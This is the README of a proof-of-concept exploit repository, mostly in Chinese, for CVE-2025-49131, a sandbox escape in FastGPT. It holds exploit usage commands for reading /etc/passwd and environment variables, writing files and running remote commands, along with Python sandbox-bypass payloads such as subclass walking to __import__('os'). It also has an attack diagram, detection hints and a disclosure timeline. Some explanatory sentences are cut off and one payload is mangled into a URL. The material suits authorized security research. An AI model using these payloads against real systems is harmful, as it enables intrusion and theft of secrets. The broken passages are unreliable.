███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
█████╗ ███████║███████╗ ██║ ██║ ███╗██████╔╝ ██║
██╔══╝ ██╔══██║╚════██║ ██║ ██║ ██║██╔═══╝ ██║
██║ ██║ ██║███████║ ██║ ╚██████╔╝██║ ██║
╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝
███████╗ █████╗ ███╗ ██╗██████╗ ██████╗ ██████╗ ██╗ ██╗
██╔════╝██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
███████╗███████║██╔██╗ ██║██║ ██║██████╔╝██║ ██║ ╚███╔╝
╚════██║██╔══██║██║╚██╗██║██║ ██║██╔══██╗██║ ██║ ██╔██╗
███████║██║ ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝
███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗
██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝
█████╗ ███████╗██║ ███████║██████╔╝█████╗
██╔══╝ ╚════██║██║ ██╔══██║██╔═══╝ ██╔══╝
███████╗███████║╚██████╗██║ ██║██║ ███████╗
╚══════╝╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚══════╝
╔═══════════════════════════════════════╗
║ CVE-2025-49131 | CVSS 6.3 ║
║ FastGPT 沙箱容器逃逸 ║
║ 受影响版本: < v4.9.11 ║
╚═══════════════════════════════════════╝
| 字段 | 值 |
|---|---|
| CVE ID | CVE-2025-49131 |
| CVSS 评分 | 6.3 (中等) |
| CVSS 向量 | AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L |
| 漏洞类型 | 沙箱逃逸 |
| 受影响软件 | FastGPT (fastgpt-sandbox 容器) |
| 受影响版本 | < 4.9.11 |
| 修复版本 | 4.9.11+ |
| 披露日期 | 2025年6月9日 |
此工具仅用于授权安全研究和教育目的。
CVE-2025-49131 是 FastGPT 的 fastgpt-sandbox 容器中的一个沙箱逃逸漏洞。该漏洞存在的原因为:
成功利用可允许攻击者:
# Clone this repository
git clone https://github.com/Wenura17125/cve-2025-49131-poc.git
cd cve-2025-49131-poc
# Install dependencies
pip install -r requirements.txt
# Run vulnerability detection
python poc.py --target http://localhost:3001 --detect
# Read a file
python poc.py --target http://localhost:3001 --read /etc/passwd
# Attempt RCE
python poc.py --target http://localhost:3001 --rce "id"
# Start vulnerable and patched containers
docker-compose up -d
# Vulnerable sandbox on port 3001
# Patched sandbox on port 3002
python poc.py --target http://localhost:3001 --detect -v
python poc.py --target http://localhost:3001 --read /etc/passwd
python poc.py --target http://localhost:3001 --read /proc/self/environ
python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"
python poc.py --target http://localhost:3001 --import os
python poc.py --target http://localhost:3001 --import subprocess
python poc.py --target http://localhost:3001 --env
python poc.py --target http://localhost:3001 --rce "whoami"
python poc.py --target http://localhost:3001 --rce "cat /etc/passwd"
python poc.py --help
cve-2025-49131-poc/
├── poc.py # Main exploit script
├── payloads.py # Payload generator library
├── docker-compose.yml # Test environment
├── requirements.txt # Python dependencies
├── README.md # This file
└── tests/
└── test_exploit.py # Automated tests
FastGPT 沙箱设计用于在隔离环境中执行用户提交的代码。然而,隔离机制不足:
Python __builtins__ 访问 - 沙箱未正确限制对内置函数(如 open()、__import__() 等)的访问。
系统调用过滤 - 允许的系统调用列表包含危险调用,使得可以访问文件系统
绕过导入限制 - 存在多种技术来绕过模块导入限制
┌─────────────────────────────────────────────┐
│ 1. Send malicious code to sandbox API │
└─────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────┐
│ 2. Bypass sandbox restrictions using: │
│ - __builtins__ manipulation │
│ - Subclass walking │
│ - Import bypass techniques │
└─────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────┐
│ 3. Gain access to: │
│ - File system (read/write) │
│ - os/subprocess modules │
│ - Environment variables │
└─────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────┐
│ 4. Impact: │
│ - Data exfiltration │
│ - Code injection │
│ - Remote command execution │
└─────────────────────────────────────────────┘
文件读取:
open('/etc/passwd', 'r').read()
__builtins__.open('/etc/passwd').read()
绕过导入:
__import__('os')
__builtins__.__import__('os')
[x for x in ().__class__.__base__.__subclasses__()
if x.__name__=='catch_warnings'][0]()._module.__builtins__['__import__'](https://github.com/wenura17125/cve-2025-49131-poc/blob/main/%27os%27)
远程代码执行:
__import__('os').popen('id').read()
__import__('subprocess').check_output('id', shell=True)
在沙箱日志中查找可疑活动:
/etc/passwd、/etc/shadow__builtins__、__import__| 日期 | 事件 |
|---|---|
| 2025-??-?? | 漏洞发现 |
| 2025-??-?? | 通知厂商 |
| 2025-06-?? | 发布补丁 (v4.9.11) |
| 2025-06-09 | 公开披露 |
本项目仅用于教育和授权安全研究目的。请负责任地使用。
为安全研究目的而创建。在测试之前务必获得适当授权。